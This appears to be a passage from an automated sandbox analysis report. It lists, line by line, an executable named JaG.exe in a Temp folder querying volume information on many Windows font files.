Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\flat_officeFontsPreview.ttf VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\OFFSYM.TTF VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\OFFSYMSL.TTF VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\OFFSYMSB.TTF VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\OFFSYMXL.TTF VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\OFFSYML.TTF VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\OFFSYMB.TTF VolumeInformation | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\JaG.exe | Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation | Jump to behavior |